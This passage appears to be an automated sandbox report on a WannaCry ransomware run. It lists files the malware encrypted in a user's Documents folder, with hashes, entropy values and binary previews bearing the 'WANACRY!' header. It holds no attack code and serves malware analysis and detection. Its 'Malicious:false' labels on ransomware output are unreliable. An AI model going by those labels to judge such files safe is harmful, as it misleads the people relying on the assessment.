                                                  SHA-512:F282564D1010D63A45AD56143E0440380BF0120EF51543F29C93D353EB9A5BC3490F58306D9AE618B274F6334A0CA0F7DC0D5D6C8DBB192D4354C3C98188EAE7
                                                  Malicious:false
                                                  Reputation:unknown
                                                  Preview:WANACRY!.....l...L.T8X....0..QYK...]..R..uG?.......|.1.......6Cy.6.L......vg........4'.h.m.w..k....&".e.,.dO4/..!..`....J.a.[....X?..cCT.1Ms..Q.=\@B..F.._..-If.*P..g7.M6.?........m._.[...._..H7..X...b.1....F..U............&...C......:..@y).D.-_.f..3..x..............tyx.....+...].L.........FT.Po...(....r.PQA...}......:/....).....V.0.e......#k....]..F.p@.....s......6F......s.D..)3_..N..H...b....-....;z.H.7+..7.)Zj.1[....a.SGLp.N...!5.X....iI..3.(l..D...|vC#...T..j...Z.mL.k....F.......A..:Md..B......V<...|.`.../y...}:^..y.[.Q.J...W..x.u..T1..........C..'..........!.......K....A.n.=.DC8.@I4m..l.m.....I.."..0.^+.4...%..y.g..,.z......^}..,......w.]I*........w.).T..}\..Wfh3a..XV...`.3.=/..w(..0#M.......b.pU].FBi'...#..z%.$..{d.B....<......._!..)..w?|.6.7;.Z...2 .-.......&..lY..Jp.H^JZ.W..i..F.q..}.A!v1...&...I ........n[.y\...*..0.0j......X..k...F]r%Q..G.@.`..;..7.[.?.B,2.r...@...J.R.>q....|..p..y..B.m.`.q.*7[;\.hO..=...[.+=....R.......U

                                                  C:\Users\user\Documents\LSBIHQFDVT\QCFWYSKMHA.png.WNCRYT

                                                  Download File
                                                  Process:C:\Users\user\Desktop\WannaCrypt0r.sk
                                                  File Type:data
                                                  Category:dropped
                                                  Size (bytes):1320
                                                  Entropy (8bit):7.838727452890481
                                                  Encrypted:false
                                                  SSDEEP:24:bk50dq7XLCL6s+CjpZn2Ax0uD13Ja925r41Kgzr98Bi3XsPyaL:bk504naSCj32AxvDy9qrkB8E3G
                                                  MD5:09055AC23F4EDB272CE925E24B19DC61
                                                  SHA1:BCA17A61BEB9E43294A86A8508D08FA4D62856EB
                                                  SHA-256:A7AC40BD8A9B50AB4986C040B6131D01A9179F534BD7EE9B4E245FC7F646E0FC
                                                  SHA-512:F282564D1010D63A45AD56143E0440380BF0120EF51543F29C93D353EB9A5BC3490F58306D9AE618B274F6334A0CA0F7DC0D5D6C8DBB192D4354C3C98188EAE7
                                                  Malicious:false
                                                  Reputation:unknown
                                                  Preview:WANACRY!.....l...L.T8X....0..QYK...]..R..uG?.......|.1.......6Cy.6.L......vg........4'.h.m.w..k....&".e.,.dO4/..!..`....J.a.[....X?..cCT.1Ms..Q.=\@B..F.._..-If.*P..g7.M6.?........m._.[...._..H7..X...b.1....F..U............&...C......:..@y).D.-_.f..3..x..............tyx.....+...].L.........FT.Po...(....r.PQA...}......:/....).....V.0.e......#k....]..F.p@.....s......6F......s.D..)3_..N..H...b....-....;z.H.7+..7.)Zj.1[....a.SGLp.N...!5.X....iI..3.(l..D...|vC#...T..j...Z.mL.k....F.......A..:Md..B......V<...|.`.../y...}:^..y.[.Q.J...W..x.u..T1..........C..'..........!.......K....A.n.=.DC8.@I4m..l.m.....I.."..0.^+.4...%..y.g..,.z......^}..,......w.]I*........w.).T..}\..Wfh3a..XV...`.3.=/..w(..0#M.......b.pU].FBi'...#..z%.$..{d.B....<......._!..)..w?|.6.7;.Z...2 .-.......&..lY..Jp.H^JZ.W..i..F.q..}.A!v1...&...I ........n[.y\...*..0.0j......X..k...F]r%Q..G.@.`..;..7.[.?.B,2.r...@...J.R.>q....|..p..y..B.m.`.q.*7[;\.hO..=...[.+=....R.......U

                                                  C:\Users\user\Documents\LSBIHQFDVT\QNCYCDFIJJ.jpg

                                                  Download File
                                                  Process:C:\Users\user\Desktop\WannaCrypt0r.sk
                                                  File Type:data
                                                  Category:dropped
                                                  Size (bytes):1026
                                                  Entropy (8bit):7.790706969654274
                                                  Encrypted:false
                                                  SSDEEP:24:8IQ+g3MVvnyYSJ4ue6hWal/qvjCiXUaWtm6M:8IhgU9q4shWal/qOiXDWe
                                                  MD5:05D85E25B74BCBB3748225A443C3D55E
                                                  SHA1:D886332244B5648091FB4794B6A64B4369AD0233
                                                  SHA-256:32E776C4FFBF771AE43341EEB33F6B05FFCD4DB6CD020391BDE8FD3CE02C22CB
                                                  SHA-512:59E5D35BB13473D64EB3201FD1A5AEE68CA4D77A2D0DB61B3AFB4A8B053B0109FC81293EFC310021F87B8DC0EAACDA3665900B9635353051D82B07324B7B2100
                                                  Malicious:false
                                                  Reputation:unknown
                                                  Preview:E..."^K+.........1~.b....h.m.%.5.8..M.9...h..l..6.p...-e....0*:..u.P.O.........~W...*...a...q.....O5......!I.w.._7..8~..{k.......d.......&.WRBh.-_...A.\a.p._4. ..n...1..._.Be.!..0h..$..8...*..T.....C!dW.E.......H.. .7.U...p.!.W.........-.+.....hWz\...E.u..^.h....%..;?..._.I.'O.!C.t5..Gy.\..)..{:..w.....g.:b.....=..}..%bAH...........2...(...}=1..-.....v@.5.I...&L..]TcD.0.N.R..U2c.~g1..........T.:..nWya..R...4...b..M.'.h...US.z..%..W..d|....~.......>,.<..M...3.?.Z.....LD...d.Qt.c......Gh+..}..MX..7..f.@t...}.3.].).M(....o.%...O....tKB.W.Q..~..1..]\S.Cn........... .S. .l...G..Q{..:.t.F....c[~.J....B..\......Gl...T.j;4.G...^...D.@L.0m..M..bQ..F..{r...t.oK. ..........Q....d......3-9......-....v.v..{.Ar..u;....H.-....^.+.PaU/....d.j./.g......R+..\.u((...m.g*9D..F4,.j.u2..J.........."..m.P.03...F.l2.....[.+Z.S........MS..S.I.>...EV.T....P.lB.c...1."..<r.....BUS....>.AJ{...sv..GH.0-..?..Q.3..7.....X_i.W.............}3...f..W .zb.GBjR..|..,W..../Wj

                                                  C:\Users\user\Documents\LSBIHQFDVT\QNCYCDFIJJ.jpg.WNCRY (copy)

                                                  Download File
                                                  Process:C:\Users\user\Desktop\WannaCrypt0r.sk
                                                  File Type:data
                                                  Category:dropped
                                                  Size (bytes):1320
                                                  Entropy (8bit):7.842247652316845
                                                  Encrypted:false
                                                  SSDEEP:24:bkoncynqW7/x/eS0yf0/MeYTpltHsvs23EgZ4uOZ+L5cjW/k1s:bko3qW7/ZeS0MptMvs2004nU6V1s
                                                  MD5:668216BED35257E537D8B452D28D51FD
                                                  SHA1:E025617503280F721E06B610C72A183B1821209D
                                                  SHA-256:0DCB97067C31AF880D4E6B9122099291CC5391CB25EC353F7D17B21BD367CB4A
                                                  SHA-512:54F4B72F5CD35BB2A2A32355423628EABB51AA3F57AAA4016CADB7EC5A312520B17C7F4CA2A1ADC7EE4D17AB9944B5222C06D80D2F776F105ECAE44797D8C5E5
                                                  Malicious:false
                                                  Reputation:unknown
                                                  Preview:WANACRY!.....]Po>..E......D*[..^B...h....-....{W.=!UC.V.).[..&.1.ir.......?.}.b........M.~.....dQ.=.<.."...u..4....t..[.VuB\x....f.`.v.}."...RrTqw.."W.q.z..f.,`.....Um..J..3+L.kCK....A,.5...G.s...S;..T..>..l*.I...x.?h...i.$t&...fl...z-#^...H......_.1."4.................V6...Cv.kL..#/..V>.e..b.....d...2i.,,1*.j...o1..H$2".iz.JdO8g4T..1T.g...D.t.JX.?.....I.....mjV...g.CwCY.`.Ar.,j..=...h;5..%y.].....;...+...k.R.f.)...'.....-.,.cO..4|..tRGNO..C.....VPZ\q..4..' ....F.eB........P......%..z.15....{.d...g....8.V.....m...h.pZ..j.ap.=....y..T'.RQ;.m.SU6.Y...._E%.1E...C7.b.=..<.............-.b.._.n....1g?..{V.....u\........pR|Mh.f.0.|.]..e..>5.\.Jc+..0%...>.v).;.2...$)......*y.P.7...P..XK...#....n....}:.....f.3l.>".....~...O..u.....8.X{#...........F.CV.!PZ.......Hj6"..Wl..vr..s..H..........C.C..5.\.0.!..`.6...4..8r<A._Cf.......R8'...7\.1DQ..S#...k.2O"..ZDk.....1.SzB..,].y.Y.a....i...R.R..K\xm.. .&.........*6......N4#Z,6B($.DDC.....f..G.....

                                                  C:\Users\user\Documents\LSBIHQFDVT\QNCYCDFIJJ.jpg.WNCRYT

                                                  Download File
                                                  Process:C:\Users\user\Desktop\WannaCrypt0r.sk
                                                  File Type:data
                                                  Category:dropped
                                                  Size (bytes):1320
                                                  Entropy (8bit):7.842247652316845
                                                  Encrypted:false
                                                  SSDEEP:24:bkoncynqW7/x/eS0yf0/MeYTpltHsvs23EgZ4uOZ+L5cjW/k1s:bko3qW7/ZeS0MptMvs2004nU6V1s
                                                  MD5:668216BED35257E537D8B452D28D51FD
                                                  SHA1:E025617503280F721E06B610C72A183B1821209D
                                                  SHA-256:0DCB97067C31AF880D4E6B9122099291CC5391CB25EC353F7D17B21BD367CB4A
                                                  SHA-512:54F4B72F5CD35BB2A2A32355423628EABB51AA3F57AAA4016CADB7EC5A312520B17C7F4CA2A1ADC7EE4D17AB9944B5222C06D80D2F776F105ECAE44797D8C5E5
                                                  Malicious:false
                                                  Reputation:unknown
                                                  Preview:WANACRY!.....]Po>..E......D*[..^B...h....-....{W.=!UC.V.).[..&.1.ir.......?.}.b........M.~.....dQ.=.<.."...u..4....t..[.VuB\x....f.`.v.}."...RrTqw.."W.q.z..f.,`.....Um..J..3+L.kCK....A,.5...G.s...S;..T..>..l*.I...x.?h...i.$t&...fl...z-#^...H......_.1."4.................V6...Cv.kL..#/..V>.e..b.....d...2i.,,1*.j...o1..H$2".iz.JdO8g4T..1T.g...D.t.JX.?.....I.....mjV...g.CwCY.`.Ar.,j..=...h;5..%y.].....;...+...k.R.f.)...'.....-.,.cO..4|..tRGNO..C.....VPZ\q..4..' ....F.eB........P......%..z.15....{.d...g....8.V.....m...h.pZ..j.ap.=....y..T'.RQ;.m.SU6.Y...._E%.1E...C7.b.=..<.............-.b.._.n....1g?..{V.....u\........pR|Mh.f.0.|.]..e..>5.\.Jc+..0%...>.v).;.2...$)......*y.P.7...P..XK...#....n....}:.....f.3l.>".....~...O..u.....8.X{#...........F.CV.!PZ.......Hj6"..Wl..vr..s..H..........C.C..5.\.0.!..`.6...4..8r<A._Cf.......R8'...7\.1DQ..S#...k.2O"..ZDk.....1.SzB..,].y.Y.a....i...R.R..K\xm.. .&.........*6......N4#Z,6B($.DDC.....f..G.....

                                                  C:\Users\user\Documents\LSBIHQFDVT\ZQIXMVQGAH.xlsx

                                                  Download File
                                                  Process:C:\Users\user\Desktop\WannaCrypt0r.sk
                                                  File Type:data
                                                  Category:dropped
                                                  Size (bytes):1026
                                                  Entropy (8bit):7.791617140072544
                                                  Encrypted:false
                                                  SSDEEP:24:vxJB1vIbc/R325nwrqo/IDVmrgA9CIJbNMAiqvV:Z1vIoZwnwu1V4xEA39
                                                  MD5:25FCAB95331909AAC0507AD8B7EF4A23
                                                  SHA1:CA8FB9291B38254F5F0AA3D601717A90C592C728
                                                  SHA-256:33F1E8CD27F852D452D7A19CECCC670FB91947044C0DFBA85821B892F96BC0E0
                                                  SHA-512:B995E3A26B5D3FE762C7ABA12205406B884A33D1965C1F79E18CD8FDD3C53BE46C30E1A385C40F60C231A2585D1AEAADEE32E3CF56EDCFB03D47B612DE8363C9
                                                  Malicious:false
                                                  Reputation:unknown
                                                  Preview:.a..eu.].,...<N^\SR.../.|..<h..f..........T.....MB..Q#."......G*....._y2..A...O.dfQ9`v.E].....\A...'.....u. ...(d...F....A'..e.o...g1..P.4...[L.....=$.0..9...0..y...x.|.{..q,....J.2...9..f..6Y....b.`.$.....7.n.".TX't@%(......vc...iy?...m7]q..?.t9.....y(C.0)...#.a4.i...^......bC..i;u...lV...EcB;..O.<.#.....r\.4?\A*8..Ft.~.P.r..*B..#4.z...}..3.0n=....c.z. .;\..qw..7.%j.hd..a}..m....}....{.h.k...<..fa.vq\u.G...=....F..0..m..Jx.6v..e.N..Hz...Vm,.;...5.,.........j.xlu0......;..A}.Q<...r...+.5....|.,..PI>..].^]e........B2..!+U..q.[.".g3fN.62u..Zia...I....m.Q..2b+B.n..G..7.,..........V&.P...E.@tXUN..].......y..!z....Z6.........^,5J.....B.....G.1.Qe..|n1.bu..>.Mi.`..%"B5Av.c.!....w../H.0.1>+....[...Z.\-Q........=...=.GK.3..y..Y...b....h9.%.u...5.n.7t....u.|.y#(..R:E[Q.q..u..)v...Q;....D..R.G.sfw.@y.......U.....b....k..h..C.8...(.w.h[:}....{i@M.3..............0.w.PS....[oiq..ni.?._"?DYl.){...&(...B....jme;..z2..-.~...c.lg.b"..(B....T....@v(

                                                  C:\Users\user\Documents\LSBIHQFDVT\ZQIXMVQGAH.xlsx.WNCRY (copy)

                                                  Download File
                                                  Process:C:\Users\user\Desktop\WannaCrypt0r.sk
                                                  File Type:data
                                                  Category:dropped
                                                  Size (bytes):1320
                                                  Entropy (8bit):7.861080497585509
                                                  Encrypted:false
                                                  SSDEEP:24:bkTopTJbjCzQb0zZpLZqztvS1Ir0tqPFks9mo8/CbFXVQtC1PjmeV94fYWu1FTGW:bkTo/bjCzuuLy5S1nteksYCvQtC1meL/
                                                  MD5:A9A833F265E2B0B2FE33232C29FC9D7D
                                                  SHA1:C0E3DFF457761007331C7E38A6DA17097F0F6BAA
                                                  SHA-256:8D60084DC9521AC3A7AEB5433A5D2CA4B2833DA62C66CCE2BE9C37E5C736E0E1
                                                  SHA-512:FA926813AA65986F77B6787E7D38427E98EAD61DB6F41CD1C2D0637DF562812CB7575D7ED9FB1199B40954620225D2E86B55BAEE01777A7CD054CAACB82C4E06
                                                  Malicious:false
                                                  Reputation:unknown
                                                  Preview:WANACRY!.....[.m.{...MX..t....J.7..^..R..e...3..r!...tbA..f....#....J..g#.8O#.Z.......h.j.....4.A.{N..mTxe'...U(.6.l.. .=}n...O..cmw._0x....'g..FYD.8+L$.zapc6OR...Mo}...8.Z....F5..a......!..G.Wr..\n...7.B....Z.....#.....<].M<.M"A........,...biA..N.F..e...sHDM.............../.......in.R.q.OZfT.....Z.0........C.wz.\.....`....s.t.Ov.14...@.(..<....b]jK....jC..o3O..0....S...p.)..............E).'^........Q.VZ.b...;Ap8..b..%b..~E;...C.p.S<.1o@.J.8u.Z...y...!2.y....IXG8X0N.Q[..5q.e...J....bg5....B#n.%.wq5.(.(.D+n..Q\.2$..?..?>.,....%Qs`.1 .c4..D{......T.7qZ....;.\.Sc.._.8...4...:..~....Q.Z[.......f.T%..y.......NY...0.....2...../K..b..I..~uV\.DB(._...DIe..;MY$.{$.R..T..$.h....Z...%.I...Z.{uuv............>Qo...cM..hlC...._.y..... p...>\~.q.....s.............Z].....~v%.t......"...8=)l..*d,E...?3#.w@......I.X..`j.h{.i.~_.T.&a.,3OY....@:.....$..D..5.Q......9.^.....mc.....Q..>w%..x4`1P._.......T1...p..}.H..t..mL.da....p.D..2KE........'.}.....eq.Y..,..uQ.L

                                                  C:\Users\user\Documents\LSBIHQFDVT\ZQIXMVQGAH.xlsx.WNCRYT

                                                  Download File
                                                  Process:C:\Users\user\Desktop\WannaCrypt0r.sk
                                                  File Type:data
                                                  Category:dropped
                                                  Size (bytes):1320
                                                  Entropy (8bit):7.861080497585509
                                                  Encrypted:false
                                                  SSDEEP:24:bkTopTJbjCzQb0zZpLZqztvS1Ir0tqPFks9mo8/CbFXVQtC1PjmeV94fYWu1FTGW:bkTo/bjCzuuLy5S1nteksYCvQtC1meL/
                                                  MD5:A9A833F265E2B0B2FE33232C29FC9D7D
                                                  SHA1:C0E3DFF457761007331C7E38A6DA17097F0F6BAA
                                                  SHA-256:8D60084DC9521AC3A7AEB5433A5D2CA4B2833DA62C66CCE2BE9C37E5C736E0E1
                                                  SHA-512:FA926813AA65986F77B6787E7D38427E98EAD61DB6F41CD1C2D0637DF562812CB7575D7ED9FB1199B40954620225D2E86B55BAEE01777A7CD054CAACB82C4E06
                                                  Malicious:false
                                                  Reputation:unknown
                                                  Preview:WANACRY!.....[.m.{...MX..t....J.7..^..R..e...3..r!...tbA..f....#....J..g#.8O#.Z.......h.j.....4.A.{N..mTxe'...U(.6.l.. .=}n...O..cmw._0x....'g..FYD.8+L$.zapc6OR...Mo}...8.Z....F5..a......!..G.Wr..\n...7.B....Z.....#.....<].M<.M"A........,...biA..N.F..e...sHDM.............../.......in.R.q.OZfT.....Z.0........C.wz.\.....`....s.t.Ov.14...@.(..<....b]jK....jC..o3O..0....S...p.)..............E).'^........Q.VZ.b...;Ap8..b..%b..~E;...C.p.S<.1o@.J.8u.Z...y...!2.y....IXG8X0N.Q[..5q.e...J....bg5....B#n.%.wq5.(.(.D+n..Q\.2$..?..?>.,....%Qs`.1 .c4..D{......T.7qZ....;.\.Sc.._.8...4...:..~....Q.Z[.......f.T%..y.......NY...0.....2...../K..b..I..~uV\.DB(._...DIe..;MY$.{$.R..T..$.h....Z...%.I...Z.{uuv............>Qo...cM..hlC...._.y..... p...>\~.q.....s.............Z].....~v%.t......"...8=)l..*d,E...?3#.w@......I.X..`j.h{.i.~_.T.&a.,3OY....@:.....$..D..5.Q......9.^.....mc.....Q..>w%..x4`1P._.......T1...p..}.H..t..mL.da....p.D..2KE........'.}.....eq.Y..,..uQ.L

                                                  C:\Users\user\Documents\NVWZAPQSQL.jpg

                                                  Download File
                                                  Process:C:\Users\user\Desktop\WannaCrypt0r.sk
                                                  File Type:data
                                                  Category:dropped
                                                  Size (bytes):1026
                                                  Entropy (8bit):7.809266884387007
                                                  Encrypted:false
                                                  SSDEEP:24:D254GyPGfFrnlPGcE7jFmqZHzuloF/NpnMcjxw:D2mjWtnu3gmPNNbxw
                                                  MD5:6111258FE7D58E1118BBCD7EF4A6BBD1
                                                  SHA1:9BE6732C0B7E9B9C5B872ECCC1EC43D371A213C7
                                                  SHA-256:128D29DD818B3A553569E2661510024ACB4463A3D46A769A730E3FB682759757
                                                  SHA-512:D0E2B04BDEF026D7501CD5E2B4EA501F6050794C892E7B511CC1799528308BF6D696907EFBB38FDEC7C7E09168F3C80CC66173BD58206117B3F79E1661DF03FE
                                                  Malicious:false
                                                  Reputation:unknown
                                                  Preview:nN.......y.`..LG\...Y[....B...."..?..Y.*a_ .>.1...?.8..A.....Iukt..D.P.2.]..Q...e.ZIw%{...Zpy...L.........&..N...x.......zZ.....7a.=..&....3.??.3......62..*....~_..3Km@l.b...^.2..O.h.v-#.$..h.q...8...`.q.D..Uf..p.}y4.....o.....B....w,...,.a.D...C5N.,......;...ZP...=.....=......... .b..=X..(...K.\.........%.f.(...khU......F..T..F.c..h..c...H.'..s.'p.....Y..2...:d7y...S....K...j...kF..V....._.....~UFp....0..#t*.`.........(.!...'.f0w..M\S..b.;'..N1..j.......#.5.(....y...!UF....n..O.z..Q\.^N..Fu.?.4& ..&O.........r.......n.c....y..&#!..\.x.nQ.....Z+.....9..]]..L`.B...9a.....<d<.].!..,....ZO.3.'$*>.%.c..#.....l...a......e.5..1.rM....X,..2......Y..............V.......O.....'. "+m:..W.o.&....0\.~])|.t:X....`..q.....;#o...].......,.s.........~.../.D.[.H.4.ZY.......Lo........UH.$ .....G3W0..(&.~.....:.'^aZU.`.....0,.^..P.q...diK~....i,A...\...4<j.g.I.W.f..|>.....s..-.,.r.k.w_Y.s.af.. ........M..P.i,.J1..s...t..yNXE....12..^P.e..m..[..S.a.s

                                                  C:\Users\user\Documents\NVWZAPQSQL.jpg.WNCRY (copy)

                                                  Download File
                                                  Process:C:\Users\user\Desktop\WannaCrypt0r.sk
                                                  File Type:data
                                                  Category:dropped
                                                  Size (bytes):1320
                                                  Entropy (8bit):7.8538507254183045
                                                  Encrypted:false
                                                  SSDEEP:24:bkr6x6esVDwhQG4bTKYo9Bfl24idjh6q/RFcpjWN17QcdifIY3H1B33DQG9yPf81:bkGgesVQQ5KJhU8qpFcFWGfHLEGkfiX
                                                  MD5:0E12742638D23D1D47BE7625F19ABDDD
                                                  SHA1:AF4F906BDADF1B9488E689BB03743E1AA8D041A8
                                                  SHA-256:7702A57E9278FB722C9277DB81C6CFAC7165B39023C53295DE910143BF57A6DF
                                                  SHA-512:59E13B093455454A7398073BBAD1DF6C600F38007CD48819152B57E5735F677C535652A3491A0777152763C262EFAE88781F86D7BD8BF1EA2D8B3E1DE75C3865
                                                  Malicious:false
                                                  Reputation:unknown
                                                  Preview:WANACRY!.......ab`..4Z.... bY...T2.......<.,U..3..D.W...57..U.%.2+}.K.L............%._.>0......u.%6.K..&:t..D.&.....5C.......#U..2.:..)../&N{..>0@.....;.....s..].RD.{..?.N.......Kad..0g.&.....S....H.x.3....M....".....1a.9J.......v.G.7.RZ.E..UX.......|.a..............;....X.3%4l.....vM...z....)..R......;.w.wk..+..c..b...5=......J..F..+.../.\_C..3.....-s....n..3.OF.=.:0.P..>t5....'.z....|.$.<\J.a?.....O....C...7;.?....6.Y..Sc......3...... ...%...d.u.t{E...".Nl.5.].!..[......5O~~.%..].t).u.AF^0..Y..}.CSQ..\${....K..m.!..x..4.;0.?d.7._........y...Rp..ny.$s.p.7V...p..]....v.c..4..z.6g....Z&.....s.%0...*..5....w1...'. ...>t..]=.$..W...fn..[.T.D....V......Z......R..A.:$....( ..%z.s..e'..%...Q....a.P.v..g.J=~f..=.5t.7\.z....[....X...+^i. 5~l.2.S4hZ.X..gT._p.5..fw......f....5..]....D.lL.T.Gk<....y<il@....A.d.r...C0..B...........V.CP...xR.O.c...M.,L.F......L9i..i.........4.....$`.h....gdm..[0..m$....m....\.o...5.t..#.M....W.t.6D......*3,

                                                  C:\Users\user\Documents\NVWZAPQSQL.jpg.WNCRYT

                                                  Download File
                                                  Process:C:\Users\user\Desktop\WannaCrypt0r.sk
                                                  File Type:data
                                                  Category:dropped
                                                  Size (bytes):1320
                                                  Entropy (8bit):7.8538507254183045
                                                  Encrypted:false
                                                  SSDEEP:24:bkr6x6esVDwhQG4bTKYo9Bfl24idjh6q/RFcpjWN17QcdifIY3H1B33DQG9yPf81:bkGgesVQQ5KJhU8qpFcFWGfHLEGkfiX
                                                  MD5:0E12742638D23D1D47BE7625F19ABDDD
                                                  SHA1:AF4F906BDADF1B9488E689BB03743E1AA8D041A8
                                                  SHA-256:7702A57E9278FB722C9277DB81C6CFAC7165B39023C53295DE910143BF57A6DF
                                                  SHA-512:59E13B093455454A7398073BBAD1DF6C600F38007CD48819152B57E5735F677C535652A3491A0777152763C262EFAE88781F86D7BD8BF1EA2D8B3E1DE75C3865
                                                  Malicious:false
                                                  Reputation:unknown
                                                  Preview:WANACRY!.......ab`..4Z.... bY...T2.......<.,U..3..D.W...57..U.%.2+}.K.L............%._.>0......u.%6.K..&:t..D.&.....5C.......#U..2.:..)../&N{..>0@.....;.....s..].RD.{..?.N.......Kad..0g.&.....S....H.x.3....M....".....1a.9J.......v.G.7.RZ.E..UX.......|.a..............;....X.3%4l.....vM...z....)..R......;.w.wk..+..c..b...5=......J..F..+.../.\_C..3.....-s....n..3.OF.=.:0.P..>t5....'.z....|.$.<\J.a?.....O....C...7;.?....6.Y..Sc......3...... ...%...d.u.t{E...".Nl.5.].!..[......5O~~.%..].t).u.AF^0..Y..}.CSQ..\${....K..m.!..x..4.;0.?d.7._........y...Rp..ny.$s.p.7V...p..]....v.c..4..z.6g....Z&.....s.%0...*..5....w1...'. ...>t..]=.$..W...fn..[.T.D....V......Z......R..A.:$....( ..%z.s..e'..%...Q....a.P.v..g.J=~f..=.5t.7\.z....[....X...+^i. 5~l.2.S4hZ.X..gT._p.5..fw......f....5..]....D.lL.T.Gk<....y<il@....A.d.r...C0..B...........V.CP...xR.O.c...M.,L.F......L9i..i.........4.....$`.h....gdm..[0..m$....m....\.o...5.t..#.M....W.t.6D......*3,

                                                  C:\Users\user\Documents\NVWZAPQSQL.mp3

                                                  Download File
                                                  Process:C:\Users\user\Desktop\WannaCrypt0r.sk
                                                  File Type:data
                                                  Category:dropped
                                                  Size (bytes):1026
                                                  Entropy (8bit):7.814816740887121
                                                  Encrypted:false
                                                  SSDEEP:24:OUeXO7RHFsTSXseWrT2OsKssDGfzdnjfPWTZn:OUh7RHFsWe2msQaz5rPWTZn
                                                  MD5:0A246085D7210CC2C2137F8ECABEBB50
                                                  SHA1:5E987FD903088BAB187A9217565B872A34BF60F9
                                                  SHA-256:5EDF801987F8121CED9D0DD690CA053498A6F323A6154324DA8AD3A81B0CDD43
                                                  SHA-512:5659CE74136FAEBD16438658A422947589079D3DF8ABB87491BCB3E8A1A7C277BC98C112B0761616135AC9B0B07DDA9CDB5A10469C5B8B171F080F9A3176516D
                                                  Malicious:false
                                                  Reputation:unknown
                                                  Preview:....I.TV-..l...'...-\;..%Ay7._..g.r.y.L..%p@...]...R..:Y..X<..t..........Maez.m5.nTP.....)..,i/*.r...Iz.{.{.a....1...9..e-..k.....6,=......B...l..7N9Y...2.....G+.,.oFm.{.,..Nt.!...<...o.......F<.].kfdt.(..hJB...`.T.$..,.$..I.]..X....<......5.*..g@R.,s....d..b...Z@.Q.....`..p..|\..V)..,@gS=...Sa.<.....(.D....?.jz....`.S.?C...5..fyJ...^WZ..+..H.i....Z..\....Y@.z..!S.D...b..[.5..T.Iy...>}X.$n.#...]|....OQY..WBb........3......<(.{KJ7.......-..r".s..{..=I.6....;../.6......+y...>...~..39........1Z..v.[..d..vL.5U`..c.P....?c<.......*.....+..3...k.^Zn..B&.:..B.3.hQ.g..cF}+.w...D.p/...;C.U.....R....}...Kd..[.......e.....1.g.S..2^4.d9...8.....#....i.x.@.:.}XUb..8... uq..;.@........z......|.G*....%.....4.I5.A... @.D.....Dz..X[!Ki...v..5...$mr...v..t..<.9...T...7...D:.R,..l>=.Afx.....@o.[.&#M}b ....s....R..U..q1..~,.L<..C.Je.....(.C.6r..%..2..y........z;._.....#.!q!n....W.@...X..N.6.6).].o|.U.4..........@...S....z]X<:.t..........0...>:.'..M:51..

                                                  C:\Users\user\Documents\NVWZAPQSQL.mp3.WNCRY (copy)

                                                  Download File
                                                  Process:C:\Users\user\Desktop\WannaCrypt0r.sk
                                                  File Type:data
                                                  Category:dropped
                                                  Size (bytes):1320
                                                  Entropy (8bit):7.861168371006819
                                                  Encrypted:false
                                                  SSDEEP:24:bkQVI4Y5wxrXQx3JVy3aUyUt8ifZ5tPeoWDWKq6lrgkakRXu:bkuY5wxrgXV+awlV9wlrgk5RXu
                                                  MD5:3B6298D5E968C0E7CC69E5AE7B95B66D
                                                  SHA1:26EBFEFED131B2AD3C8015C141D5084D995937F1
                                                  SHA-256:FBB7D1E1ED19064EBA385F45AA2288B04A02C8D6A2575116E730A770F5FBE499
                                                  SHA-512:E556333E5635478FC562128663964CED667244ED54B1B68F4CEAF8F963643759B383F94FC57ED355F34B0AD0E26C28DAA1D8E72AEE682DDF2A4D8087C11B3816
                                                  Malicious:false
                                                  Reputation:unknown
                                                  Preview:WANACRY!....v..%..V.P.r.J..u...?......;P.."J...-...y>...?.h.9..,...4s%...^F........=..I.X.5...-....K...|f....[..a...%.."o.%.YX[@b..C=..kE.e...GT.....%`.5BfK..JI..?..#{n*^.vJ.R.Wg.a/...G^.-.J9....<.....o...g......el?....q...Z/9.....;Iu...........#b.8..#:S.!X............!.X,\......r]..&m.....:+.S......dF.Z..Wr......c.....#ELuQ.aE..;.P..].C....k1$.?...U....L;:z..O. Y.:I*<..W...z.........}.....].5...4...F<.....G.T.....[..,.X..`.s.n..ja..2.y>........DNf/....^.tI..~y....#......eV..r..........=..`......bOl.........C..i@..j6....g....{..v..R.L09@WVc8W|......Z....f.....X...D..|..F..:u/......J.}m...mU.k.....-.....II.=.Zj...u|.F.(hPN...`.,.CS..2 ...r'.A!X..P.8...b.;.1(..-...kc..>..u..OMXK8....f...8K@..1..Y...D..$.GU.....UYn.......%.|.?.*#.V.r........Y/_..J..m..P]..&^..P...</.a..Sz...>....e..J...... .....T..._..7U.4....#y...0..A=Sq=!w.=g...($Ja.d]..b}J.t......2.p/. .s+........?..H...h.=......v.M)j<1...Q......1....Z.b*.....P....R.Z'E9......;.E.L.ve(.P..LV

                                                  C:\Users\user\Documents\NVWZAPQSQL.mp3.WNCRYT

                                                  Download File
                                                  Process:C:\Users\user\Desktop\WannaCrypt0r.sk
                                                  File Type:data
                                                  Category:dropped
                                                  Size (bytes):1320
                                                  Entropy (8bit):7.861168371006819
                                                  Encrypted:false
                                                  SSDEEP:24:bkQVI4Y5wxrXQx3JVy3aUyUt8ifZ5tPeoWDWKq6lrgkakRXu:bkuY5wxrgXV+awlV9wlrgk5RXu
                                                  MD5:3B6298D5E968C0E7CC69E5AE7B95B66D
                                                  SHA1:26EBFEFED131B2AD3C8015C141D5084D995937F1
                                                  SHA-256:FBB7D1E1ED19064EBA385F45AA2288B04A02C8D6A2575116E730A770F5FBE499
                                                  SHA-512:E556333E5635478FC562128663964CED667244ED54B1B68F4CEAF8F963643759B383F94FC57ED355F34B0AD0E26C28DAA1D8E72AEE682DDF2A4D8087C11B3816
                                                  Malicious:false
                                                  Reputation:unknown
